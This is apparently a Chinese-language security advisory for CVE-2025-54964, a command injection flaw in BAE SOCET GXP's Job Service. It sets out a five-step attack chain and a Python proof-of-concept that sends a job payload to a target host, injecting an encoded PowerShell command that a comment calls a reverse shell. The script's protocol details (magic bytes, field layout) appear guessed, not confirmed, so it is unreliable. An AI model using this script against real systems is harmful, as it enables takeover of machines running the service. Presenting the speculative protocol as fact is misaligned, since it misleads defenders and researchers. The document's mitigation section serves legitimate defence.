CVE-2025-54964 BAE SOCET GXP Job Service 命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-54964

漏洞类型

命令注入/远程代码执行

CVSS评分

8.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

BAE SOCET GXP

漏洞概述

CVE-2025-54964是BAE Systems公司地理空间开发产品SOCET GXP中的一个高危安全漏洞，CVSS评分达到8.4。该漏洞存在于GXP Job Service组件中，攻击者可以通过与Job Service的交互实现任意可执行文件的注入。SOCET GXP是一款专业的地理空间情报分析平台，广泛应用于军事、情报和民事遥感领域。漏洞的严重性在于其攻击向量灵活：当Job Service配置为仅本地访问时，可能被用于权限提升攻击；当Job Service暴露在网络环境中时，则可能导致严重的远程代码执行风险。由于该服务在默认配置下可能以较高权限运行，攻击成功后可直接获得系统控制权。此漏洞影响SOCET GXP 4.6.0.2之前的所有版本，厂商已在4.6.0.2版本中完成修复。建议所有使用该产品的用户立即评估自身环境的安全配置，并采取相应的防护或升级措施。

技术细节

该漏洞的根本原因在于BAE SOCET GXP的Job Service组件缺乏对用户输入的有效验证和过滤。Job Service是SOCET GXP中负责处理后台作业和任务调度的核心服务，它允许用户提交、管理和执行各种地理空间数据处理任务。攻击者通过构造特定的请求包，可以在作业定义中注入恶意的命令或可执行代码。

具体攻击手法涉及以下几个方面：首先，攻击者需要能够与Job Service进行交互，这可以通过本地访问或通过网络远程连接实现（取决于服务配置）。其次，攻击者利用服务对输入参数处理不当的缺陷，将操作系统命令或可执行文件路径嵌入到作业配置中。第三，当Job Service解析和执行这些作业时，注入的恶意代码将以服务进程的权限级别被触发。

由于SOCET GXP的Job Service通常以SYSTEM或管理员权限运行（尤其是在Windows环境下），成功利用此漏洞的攻击者可以获得目标系统的完全控制权。攻击者可以执行任意命令、安装后门、窃取敏感数据或进一步横向移动到网络中的其他系统。漏洞的利用不需要任何身份认证，这在一定程度上增加了其危害性。

攻击链分析

STEP 1

1. 信息收集

攻击者首先识别目标环境中的BAE SOCET GXP安装，定位Job Service的访问端点（端口8443或8080）。可以通过端口扫描或利用已知的服务指纹识别技术确认服务存在。

STEP 2

2. 访问建立

攻击者建立与Job Service的网络连接。如果服务配置为本地访问，需要先通过其他方式（如社工、物理访问或利用其他漏洞）获得本地访问权限；如果服务网络可访问，则可直接连接。

STEP 3

3. 恶意请求构造

攻击者构造包含恶意代码的作业提交请求。在作业配置参数中注入操作系统命令或可执行文件路径，利用Job Service对输入验证不足的缺陷绕过安全检查。

STEP 4

4. 漏洞触发

Job Service解析并执行提交的作业，此时注入的恶意代码将以服务进程的权限级别被触发执行。由于服务通常以SYSTEM或管理员权限运行，攻击者获得高权限执行上下文。

STEP 5

5. 目标达成

攻击者成功执行任意代码后，可以完全控制目标系统，执行数据窃取、持久化后门安装、横向移动等后续攻击行动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-54964 PoC - BAE SOCET GXP Job Service Command Injection
# This PoC demonstrates the command injection vulnerability in GXP Job Service

import socket
import struct
import sys

def create_malicious_job_payload(cmd):
    """Generate malicious job payload with command injection
    
    The vulnerability allows injection of arbitrary executables through
    job service parameters. This PoC shows the structure of a malicious
    job submission that could trigger code execution.
    """
    # Job Service header
    header = b'\x47\x58\x50\x4a'  # GXPJ magic bytes
    version = struct.pack('<H', 1)  # Protocol version
    
    # Malicious job configuration with command injection
    # The Job Service does not properly sanitize job parameters
    job_config = {
        'job_type': 'custom',
        'command': cmd,  # Injected command
        'executable_path': 'C:\\Windows\\System32\\cmd.exe',
        'arguments': f'/c {cmd}',
        'working_directory': 'C:\\Program Files\\BAE Systems\\SOCET GXP\\bin',
        'run_as_system': True,
        'priority': 'high'
    }
    
    # Serialize job configuration
    payload = bytearray()
    for key, value in job_config.items():
        key_bytes = key.encode('utf-8')
        value_bytes = str(value).encode('utf-8')
        payload.extend(struct.pack('<I', len(key_bytes)))
        payload.extend(key_bytes)
        payload.extend(struct.pack('<I', len(value_bytes)))
        payload.extend(value_bytes)
    
    return header + version + struct.pack('<I', len(payload)) + bytes(payload)

def send_job_request(target_ip, target_port, malicious_payload):
    """Send malicious job request to GXP Job Service
    
    Target: GXP Job Service (typically port 8443 or 8080)
    Note: Requires network access to Job Service endpoint
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        
        # Send malicious payload
        sock.sendall(malicious_payload)
        
        # Receive response
        response = sock.recv(4096)
        sock.close()
        
        return response
    except Exception as e:
        return f"Error: {str(e)}"

def main():
    if len(sys.argv) < 3:
        print("Usage: python cve_2025_54964_poc.py <target_ip> <port>")
        print("Example: python cve_2025_54964_poc.py 192.168.1.100 8443")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    target_port = int(sys.argv[2])
    
    # Example command injection - creates a reverse shell connection
    # In real attack, this would be customized based on target environment
    injected_command = "powershell -EncodedCommand <base64_encoded_payload>"
    
    print(f"[*] Generating malicious job payload...")
    payload = create_malicious_job_payload(injected_command)
    
    print(f"[*] Sending payload to {target_ip}:{target_port}...")
    response = send_job_request(target_ip, target_port, payload)
    
    print(f"[*] Response received: {response}")
    print(f"[*] If vulnerable, the injected command will be executed by Job Service")

if __name__ == "__main__":
    main()

影响范围

BAE SOCET GXP < 4.6.0.2

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：首先，确认Job Service的网络可达性，将服务绑定至localhost或仅允许受信任的管理工作站访问；其次，审查并限制与Job Service交互的用户账户，确保只有授权人员能够提交作业请求；第三，启用操作系统层面的审计功能，记录所有作业提交和执行事件，便于事后分析和取证；第四，考虑在Job Service前端部署Web应用防火墙或API网关，对请求内容进行深度检查，拦截包含可疑命令语法的请求；最后，评估是否可以在网络层面阻断对Job Service端口的外部访问，通过防火墙规则限制只有特定管理IP可以连接。